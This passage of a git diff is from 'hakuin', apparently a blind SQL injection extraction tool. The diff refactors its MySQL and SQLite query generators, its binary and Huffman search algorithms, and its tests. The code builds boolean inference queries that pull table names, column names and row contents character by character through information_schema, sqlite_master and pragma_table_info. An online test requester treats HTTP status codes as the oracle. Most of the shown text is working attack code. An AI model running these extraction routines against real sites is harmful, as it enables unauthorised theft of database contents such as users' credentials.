MySQLColumnsQueries(UniformQueries): + def rows_count(self, ctx, n): + query = f''' + SELECT count(*) < {n} + FROM information_schema.COLUMNS + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' + ''' + return self.normalize(query) + + + def rows_are_ascii(self, ctx): + query = f''' + SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII)) + FROM information_schema.COLUMNS + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' + ''' + return self.normalize(query) + + + def row_is_ascii(self, ctx): + query = f''' + SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII)) + FROM information_schema.COLUMNS + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_is_ascii(self, ctx): + query = f''' + SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1} + FROM information_schema.COLUMNS + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char(self, ctx, values): + has_eos = EOS in values + values = [v for v in values if v != EOS] + values = ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}') + FROM information_schema.COLUMNS + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = f''' + SELECT char_length(COLUMN_NAME) != {len(ctx.s)} AND + locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}') + FROM information_schema.COLUMNS + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_unicode(self, ctx, n): + query = f''' + SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n} + FROM information_schema.COLUMNS + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def string(self, ctx): + raise NotImplementedError('TODO?') + + + +class MySQLRowsQueries(UniformQueries): + def rows_count(self, ctx, n): + query = f''' + SELECT count(*) < {n} + FROM {MySQL.escape(ctx.table)} + ''' + return self.normalize(query) + + + def rows_are_ascii(self, ctx): + query = f''' + SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII)) + FROM {MySQL.escape(ctx.table)} + ''' + return self.normalize(query) + + + def row_is_ascii(self, ctx): + query = f''' + SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII)) + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_is_ascii(self, ctx): + query = f''' + SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1} + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char(self, ctx, values): + has_eos = EOS in values + values = [v for v in values if v != EOS] + values = ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}') + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = f''' + SELECT char_length({MySQL.escape(ctx.column)}) != {len(ctx.s)} AND + locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}') + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_unicode(self, ctx, n): + query = f''' + SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {n} + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def string(self, ctx, values): + values = [f"x'{v.encode('utf-8').hex()}'" for v in values] + query = f''' + SELECT {MySQL.escape(ctx.column)} in ({','.join(values)}) + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + class MySQL(DBMS): DATA_TYPES = [ @@ -14,151 +303,15 @@ class MySQL(DBMS): 'multilinestring', 'multipolygon', 'geometrycollection ', 'json' ] + MetaQueries = MySQLMetaQueries() + TablesQueries = MySQLTablesQueries() + ColumnsQueries = MySQLColumnsQueries() + RowsQueries = MySQLRowsQueries() - def count_rows(self, ctx, n): - query = f''' - SELECT COUNT(*) < {n} - FROM {ctx.table} - ''' - return self.normalize(query) - - - def count_tables(self, ctx, n): - query = f''' - SELECT COUNT(*) < {n} - FROM information_schema.TABLES - WHERE TABLE_SCHEMA=DATABASE() - ''' - return self.normalize(query) - - - def count_columns(self, ctx, n): - query = f''' - SELECT COUNT(*) < {n} - FROM information_schema.COLUMNS - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' - ''' - return self.normalize(query) - - - def meta_type(self, ctx, values): - values = [f"'{v}'" for v in values] - query = f''' - SELECT LOWER(DATA_TYPE) in ({','.join(values)}) - FROM information_schema.columns - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' AND - COLUMN_NAME='{ctx.column}' - ''' - return self.normalize(query) - - - def meta_is_nullable(self, ctx): - query = f''' - SELECT IS_NULLABLE='YES' - FROM information_schema.columns - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' AND - COLUMN_NAME='{ctx.column}' - ''' - return self.normalize(query) - - - def meta_is_pk(self, ctx): - query = f''' - SELECT COLUMN_KEY='PRI' - FROM information_schema.columns - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' AND - COLUMN_NAME='{ctx.column}' - ''' - return self.normalize(query) - - - def char_rows(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - # if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True - query = f''' - SELECT LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}') - FROM {ctx.table} - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND - LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}') - FROM {ctx.table} - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def char_tables(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - query = f''' - SELECT LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}') - FROM information_schema.TABLES - WHERE TABLE_SCHEMA=DATABASE() - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1) != '' AND - LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}') - FROM information_schema.TABLES - WHERE TABLE_SCHEMA=DATABASE() - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def char_columns(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - query = f''' - SELECT LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}') - FROM information_schema.COLUMNS - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1) != '' AND - LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}') - FROM information_schema.COLUMNS - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def string_rows(self, ctx, values): - values = [f"x'{v.encode('ascii').hex()}'" for v in values] - query = f''' - SELECT {ctx.column} in ({','.join(values)}) - FROM {ctx.table} - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) + @staticmethod + def escape(s): + if DBMS._RE_ESCAPE.match(s): + return s + assert '`' not in s, f'Cannot escape "{s}"' + return f'`{s}`' diff --git a/hakuin/dbms/SQLite.py b/hakuin/dbms/SQLite.py index 3f79011..cb41a03 100644 --- a/hakuin/dbms/SQLite.py +++ b/hakuin/dbms/SQLite.py @@ -1,145 +1,290 @@ from hakuin.utils import EOS -from .DBMS import DBMS +from .DBMS import DBMS, MetaQueries, UniformQueries -class SQLite(DBMS): - DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB'] - - - - def count_rows(self, ctx, n): +class SQLiteMetaQueries(MetaQueries): + def column_data_type(self, ctx, values): + values = [f"'{v}'" for v in values] query = f''' - SELECT COUNT(*) < {n} - FROM {ctx.table} + SELECT type in ({','.join(values)}) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + WHERE name=x'{self.hex(ctx.column)}' ''' return self.normalize(query) - def count_tables(self, ctx, n): + def column_is_nullable(self, ctx): query = f''' - SELECT COUNT(*) < {n} + SELECT [notnull] == 0 + FROM pragma_table_info(x'{self.hex(ctx.table)}') + WHERE name=x'{self.hex(ctx.column)}' + ''' + return self.normalize(query) + + + def column_is_pk(self, ctx): + query = f''' + SELECT pk + FROM pragma_table_info(x'{self.hex(ctx.table)}') + WHERE name=x'{self.hex(ctx.column)}' + ''' + return self.normalize(query) + + + +class SQLiteTablesQueries(UniformQueries): + def rows_count(self, ctx, n): + query = f''' + SELECT count(*) < {n} FROM sqlite_master WHERE type='table' ''' return self.normalize(query) - def count_columns(self, ctx, n): + def rows_are_ascii(self, ctx): + # SQLite does not have native "isascii" function. As a workaround we try to look for + # non-ascii characters with "*[^\x01-0x7f]*" glob patterns. The pattern does not need to + # include the null terminator (0x00) because SQLite will never pass it to the GLOB expression. + # Also, the pattern is hex-encoded because SQLite does not support special characters in + # string literals. Lastly, sum() simulates the logical ANY operator here. Note that an empty string + # resolves to True, which is correct. query = f''' - SELECT COUNT(*) < {n} - FROM pragma_table_info('{ctx.table}') + SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)) + FROM sqlite_master + WHERE type='table' ''' return self.normalize(query) - def meta_type(self, ctx, values): - values = [f"'{v}'" for v in values] + def row_is_ascii(self, ctx): query = f''' - SELECT type in ({','.join(values)}) - FROM pragma_table_info('{ctx.table}') - WHERE name='{ctx.column}' - ''' - return self.normalize(query) - - - def meta_is_nullable(self, ctx): - query = f''' - SELECT [notnull] == 0 - FROM pragma_table_info('{ctx.table}') - WHERE name='{ctx.column}' - ''' - return self.normalize(query) - - - def meta_is_pk(self, ctx): - query = f''' - SELECT pk - FROM pragma_table_info('{ctx.table}') - WHERE name='{ctx.column}' - ''' - return self.normalize(query) - - - def char_rows(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - # if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True - query = f''' - SELECT instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1)) - FROM {ctx.table} - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT substr({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND - instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1)) - FROM {ctx.table} - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def char_tables(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - query = f''' - SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) - FROM sqlite_master - WHERE type='table' - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND - instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) - FROM sqlite_master - WHERE type='table' - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def char_columns(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - query = f''' - SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) - FROM pragma_table_info('{ctx.table}') - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND - instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) - FROM pragma_table_info('{ctx.table}') - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def string_rows(self, ctx, values): - values = [f"x'{v.encode('ascii').hex()}'" for v in values] - query = f''' - SELECT cast({ctx.column} as BLOB) in ({','.join(values)}) - FROM {ctx.table} + SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM sqlite_master + WHERE type='table' LIMIT 1 OFFSET {ctx.row} ''' return self.normalize(query) + + + def char_is_ascii(self, ctx): + query = f''' + SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM sqlite_master + WHERE type='table' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char(self, ctx, values): + has_eos = EOS in values + values = [v for v in values if v != EOS] + values = ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) + FROM sqlite_master + WHERE type='table' + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = f''' + SELECT length(name) != {len(ctx.s)} AND + instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) + FROM sqlite_master + WHERE type='table' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_unicode(self, ctx, n): + query = f''' + SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n} + FROM sqlite_master + WHERE type='table' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def string(self, ctx): + raise NotImplementedError('TODO?') + + + +class SQLiteColumnsQueries(UniformQueries): + def rows_count(self, ctx, n): + query = f''' + SELECT count(*) < {n} + FROM pragma_table_info(x'{self.hex(ctx.table)}') + ''' + return self.normalize(query) + + + def rows_are_ascii(self, ctx): + query = f''' + SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + ''' + return self.normalize(query) + + + def row_is_ascii(self, ctx): + query = f''' + SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_is_ascii(self, ctx): + query = f''' + SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char(self, ctx, values): + has_eos = EOS in values + values = [v for v in values if v != EOS] + values = ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = f''' + SELECT length(name) != {len(ctx.s)} AND + instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_unicode(self, ctx, n): + query = f''' + SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n} + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def string(self, ctx): + raise NotImplementedError('TODO?') + + + +class SQLiteRowsQueries(UniformQueries): + def rows_count(self, ctx, n): + query = f''' + SELECT count(*) < {n} + FROM {SQLite.escape(ctx.table)} + ''' + return self.normalize(query) + + + def rows_are_ascii(self, ctx): + query = f''' + SELECT sum({SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT)) + FROM {SQLite.escape(ctx.table)} + ''' + return self.normalize(query) + + + def row_is_ascii(self, ctx): + query = f''' + SELECT {SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_is_ascii(self, ctx): + query = f''' + SELECT substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char(self, ctx, values): + has_eos = EOS in values + values = [v for v in values if v != EOS] + values = ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = f''' + SELECT length({SQLite.escape(ctx.column)}) != {len(ctx.s)} AND + instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_unicode(self, ctx, n): + query = f''' + SELECT unicode(substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) < {n} + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def string(self, ctx, values): + values = [f"x'{v.encode('utf-8').hex()}'" for v in values] + query = f''' + SELECT cast({SQLite.escape(ctx.column)} as BLOB) in ({','.join(values)}) + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + + + +class SQLite(DBMS): + DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB'] + + MetaQueries = SQLiteMetaQueries() + TablesQueries = SQLiteTablesQueries() + ColumnsQueries = SQLiteColumnsQueries() + RowsQueries = SQLiteRowsQueries() diff --git a/hakuin/search_algorithms.py b/hakuin/search_algorithms.py index 0dd3042..3a73fb9 100644 --- a/hakuin/search_algorithms.py +++ b/hakuin/search_algorithms.py @@ -42,19 +42,23 @@ class SearchAlgorithm(metaclass=ABCMeta): -class IntExponentialSearch(SearchAlgorithm): - '''Exponential search for integers.''' - def __init__(self, requester, query_cb, upper=16, correct=None): +class IntExponentialBinarySearch(SearchAlgorithm): + '''Exponential and binary search for integers.''' + def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None): '''Constructor. Params: requester (Requester): Requester instance query_cb (function): query construction function - upper (int): initial upper bound of search range + lower (int): lower bound of search range + upper (int): upper bound of search range + find_range (bool): exponentially expands range until the correct value is within correct (int|None): correct value. If provided, the search is emulated ''' super().__init__(requester, query_cb) + self.lower = lower self.upper = upper + self.find_range = find_range self.correct = correct self.n_queries = 0 @@ -63,22 +67,26 @@ class IntExponentialSearch(SearchAlgorithm): '''Runs the search algorithm. Params: - ctx (Context): inference context + ctx (Context): extraction context Returns: int: inferred number ''' self.n_queries = 0 - lower, upper = self._get_range(ctx, lower=0, upper=self.upper) + if self.find_range: + lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper) + else: + lower, upper = self.lower, self.upper + return self._search(ctx, lower, upper) - def _get_range(self, ctx, lower, upper): + def _find_range(self, ctx, lower, upper): '''Exponentially expands the search range until the correct value is within. Params: - ctx (Context): inference context + ctx (Context): extraction context lower (int): lower bound upper (int): upper bound @@ -88,14 +96,14 @@ class IntExponentialSearch(SearchAlgorithm): if self._query(ctx, upper): return lower, upper - return self._get_range(ctx, upper, upper * 2) + return self._find_range(ctx, upper, upper * 2) def _search(self, ctx, lower, upper): '''Numeric binary search. Params: - ctx (Context): inference context + ctx (Context): extraction context lower (int): lower bound upper (int): upper bound @@ -108,8 +116,8 @@ class IntExponentialSearch(SearchAlgorithm): middle = (lower + upper) // 2 if self._query(ctx, middle): return self._search(ctx, lower, middle) - else: - return self._search(ctx, middle, upper) + + return self._search(ctx, middle, upper) def _query(self, ctx, n): @@ -118,8 +126,8 @@ class IntExponentialSearch(SearchAlgorithm): if self.correct is None: query_string = self.query_cb(ctx, n) return self.requester.request(ctx, query_string) - else: - return self.correct < n + + return self.correct < n @@ -144,13 +152,12 @@ class BinarySearch(SearchAlgorithm): '''Runs the search algorithm. Params: - ctx (Context): inference context + ctx (Context): extraction context Returns: value|None: inferred value or None on fail ''' self.n_queries = 0 - return self._search(ctx, self.values) @@ -165,8 +172,8 @@ class BinarySearch(SearchAlgorithm): if self._query(ctx, left): return self._search(ctx, left) - else: - return self._search(ctx, right) + + return self._search(ctx, right) def _query(self, ctx, values): @@ -175,8 +182,8 @@ class BinarySearch(SearchAlgorithm): if self.correct is None: query_string = self.query_cb(ctx, values) return self.requester.request(ctx, query_string) - else: - return self.correct in values + + return self.correct in values @@ -204,13 +211,12 @@ class TreeSearch(SearchAlgorithm): '''Runs the search algorithm. Params: - ctx (Context): inference context + ctx (Context): extraction context Returns: value|None: inferred value or None on fail ''' self.n_queries = 0 - return self._search(ctx, self.tree, in_tree=self.in_tree) @@ -218,7 +224,7 @@ class TreeSearch(SearchAlgorithm): '''Tree search. Params: - ctx (Context): inference context + ctx (Context): extraction context tree (utils.huffman.Node): Huffman tree to search in_tree (bool): True if the correct value is known to be in the tree @@ -237,10 +243,11 @@ class TreeSearch(SearchAlgorithm): if self._query(ctx, tree.left.values()): return self._search(ctx, tree.left, True) - else: - if tree.right is None: - return None - return self._search(ctx, tree.right, in_tree) + + if tree.right is None: + return None + + return self._search(ctx, tree.right, in_tree) def _query(self, ctx, values): @@ -249,5 +256,5 @@ class TreeSearch(SearchAlgorithm): if self.correct is None: query_string = self.query_cb(ctx, values) return self.requester.request(ctx, query_string) - else: - return self.correct in values + + return self.correct in values diff --git a/hakuin/utils/__init__.py b/hakuin/utils/__init__.py index f662d93..3287c12 100644 --- a/hakuin/utils/__init__.py +++ b/hakuin/utils/__init__.py @@ -7,8 +7,10 @@ DIR_FILE = os.path.dirname(os.path.realpath(__file__)) DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..')) DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models') +ASCII_MAX = 0x7f +UNICODE_MAX = 0x10ffff + CHARSET_ASCII = [chr(x) for x in range(128)] + [''] -CHARSET_SCHEMA = list(string.ascii_lowercase + string.digits + '_#@') + [''] EOS = '' SOS = '' diff --git a/tests/OfflineRequester.py b/tests/OfflineRequester.py index 041273b..aecd048 100644 --- a/tests/OfflineRequester.py +++ b/tests/OfflineRequester.py @@ -12,22 +12,31 @@ DIR_DBS = os.path.abspath(os.path.join(DIR_FILE, 'dbs')) class OfflineRequester(Requester): '''Offline requester for testing purposes.''' - def __init__(self, db): + def __init__(self, db, verbose=False): '''Constructor. Params: db (str): name of an .sqlite DB in the "dbs" dir + verbose (bool): flag for verbous prints ''' db_file = os.path.join(DIR_DBS, f'{db}.sqlite') assert os.path.exists(db_file), f'DB not found: {db_file}' self.db = sqlite3.connect(db_file).cursor() + self.verbose = verbose self.n_queries = 0 def request(self, ctx, query): self.n_queries += 1 query = f'SELECT cast(({query}) as bool)' - return bool(self.db.execute(query).fetchone()[0]) + + res = bool(self.db.execute(query).fetchone()[0]) + + if self.verbose: + print(f'"{ctx.s}"\t{res}\t{query}') + + return res + def reset(self): diff --git a/tests/dbs/unicode.json b/tests/dbs/unicode.json new file mode 100644 index 0000000..153f30a --- /dev/null +++ b/tests/dbs/unicode.json @@ -0,0 +1,7 @@ +{ + "Ħ€ȽȽ© ŴǑȒȽƉ": [ + { + "Ħ€ȽȽ© ŴǑȒȽƉ": "Ħ€ȽȽ© ŴǑȒȽƉ" + } + ] +} \ No newline at end of file diff --git a/tests/dbs/unicode.sqlite b/tests/dbs/unicode.sqlite new file mode 100644 index 0000000000000000000000000000000000000000..828cff1090f390ffca2866c5289a1840e3b85cba GIT binary patch literal 20480 zcmeI(Jxc>I7{Kw|)wbM;J-6x>u7fRzAmY$Pta3xOg4ToDsZ^{`sMePgTooK#1a)>5 z1V`5{;>&#w2fsuYQ*H4EDHJ+b`VSY9kQb8QO-~@38@Z}ik-PPyy|O3g#JJEju_&bw zBC2w@opn`?syw1{CuyBZmoh453M*r3fNm9pb!8P|%~-R`c)Ack009ILKmY**5I_I{ z1pcXjCBJ(Rd=EolSY=?OG+!6R7ITc_-sK(#y{TCurieG2uF5I_I{1Q0*~0R#|0009ILKwzK+ zCNw=AxG0dncLb(77xDi<|6DeY00IagfB*srAbT55DamnuBvt1Q0*~0R#|0009ILKmY**hC$#9cT{}5 literal 0 HcmV?d00001 diff --git a/tests/test_large_content.py b/tests/test_large_content.py index 398eed4..677c5a7 100644 --- a/tests/test_large_content.py +++ b/tests/test_large_content.py @@ -21,7 +21,7 @@ FILE_LARGE_CONTENT_JSON = os.path.join(DIR_DBS, 'large_content.json') def main(): assert len(sys.argv) in [1, 3], 'python3 experiment_generic_db_offline.py [table> ]' - requester = OfflineRequester(db='large_content') + requester = OfflineRequester(db='large_content', verbose=False) ext = Extractor(requester=requester, dbms=SQLite()) if len(sys.argv) == 3: @@ -60,58 +60,58 @@ if __name__ == '__main__': # { # "users": { # "username": [ -# 42124, -# 5.738182808881624 +# 42125, +# 5.738319030104891 # ], # "first_name": [ -# 27901, -# 4.882919145957298 +# 27902, +# 4.883094154707735 # ], # "last_name": [ -# 32701, -# 5.344173884621671 +# 32702, +# 5.344337310017977 # ], # "sex": [ -# 1608, -# 0.3216 +# 1609, +# 0.3218 # ], # "email": [ -# 78138, -# 3.7532062058696383 +# 78139, +# 3.7532542389163743 # ], # "password": [ -# 137115, -# 4.28484375 +# 137116, +# 4.284875 # ], # "address": [ -# 86872, -# 2.1946795341434453 +# 86873, +# 2.1947047975140843 # ] # }, # "posts": { # "text": [ -# 409302, -# 4.312482220185226 +# 409303, +# 4.312492756371759 # ] # }, # "comments": { # "text": [ -# 346373, -# 3.920464063384267 +# 346374, +# 3.9204753820033957 # ] # }, # "products": { # "name": [ -# 491174, -# 3.8737341871983344 +# 491175, +# 3.873742073882457 # ], # "category": [ -# 6721, -# 0.42975893599334997 +# 6753, +# 0.4318051026280453 # ], # "description": [ -# 966309, -# 3.2259549579023976 +# 966310, +# 3.2259582963324007 # ] # } # } diff --git a/tests/test_large_schema.py b/tests/test_large_schema.py index c4e43c5..60bf245 100644 --- a/tests/test_large_schema.py +++ b/tests/test_large_schema.py @@ -27,3 +27,8 @@ def main(): if __name__ == '__main__': main() + + +# Expected results: +# Total requests: 27376 +# Average RPC: 2.2098805295447206 \ No newline at end of file diff --git a/tests/test_online.py b/tests/test_online.py index bced01d..20b44ff 100644 --- a/tests/test_online.py +++ b/tests/test_online.py @@ -25,13 +25,17 @@ class R(Requester): r = requests.get(url) assert r.status_code in [200, 404], f'Unexpected resposne code: {r.status_code}' + + # print(ctx.s, r.status_code == 200, query) return r.status_code == 200 def main(): - assert len(sys.argv) == 4, 'python3 experiment_generic_db.py ' - _, dbms_type, table, column = sys.argv + assert len(sys.argv) >= 2, 'python3 experiment_generic_db.py [
]' + argv = sys.argv + [None, None] + _, dbms_type, table, column = argv[:4] + allowed = ['sqlite', 'mysql'] assert dbms_type in allowed, f'dbms must be in {allowed}' @@ -39,10 +43,12 @@ def main(): dbms = SQLite() if dbms_type == 'sqlite' else MySQL() ext = Extractor(requester, dbms) - res = ext.extract_schema(metadata=True) - print(json.dumps(res, indent=4)) - res = ext.extract_column(table, column) - print(json.dumps(res, indent=4)) + if table is None: + res = ext.extract_schema(strategy='model', metadata=True) + print(json.dumps(res, indent=4)) + else: + res = ext.extract_column(table, column) + print(json.dumps(res, indent=4)) diff --git a/tests/test_small_schema.py b/tests/test_small_schema.py new file mode 100644 index 0000000..fecd828 --- /dev/null +++ b/tests/test_small_schema.py @@ -0,0 +1,29 @@ +import json +import logging + +from hakuin.dbms import SQLite +from hakuin import Extractor + +from OfflineRequester import OfflineRequester + + + +logging.basicConfig(level=logging.INFO) + + + +def main(): + requester = OfflineRequester(db='large_content') + ext = Extractor(requester=requester, dbms=SQLite()) + + res = ext.extract_schema(metadata=True) + print(json.dumps(res, indent=4)) + + res_len = sum([len(table) for table in res]) + res_len += sum([len(column) for table, columns in res.items() for column in columns]) + print('Total requests:', requester.n_queries) + print('Average RPC:', requester.n_queries / res_len) + + +if __name__ == '__main__': + main() diff --git a/tests/test_unicode.py b/tests/test_unicode.py new file mode 100644 index 0000000..310856c --- /dev/null +++ b/tests/test_unicode.py @@ -0,0 +1,28 @@ +import json +import logging + +import hakuin +from hakuin import Extractor +from hakuin.dbms import SQLite + +from OfflineRequester import OfflineRequester + + + +logging.basicConfig(level=logging.INFO) + + + +def main(): + requester = OfflineRequester(db='unicode', verbose=False) + ext = Extractor(requester=requester, 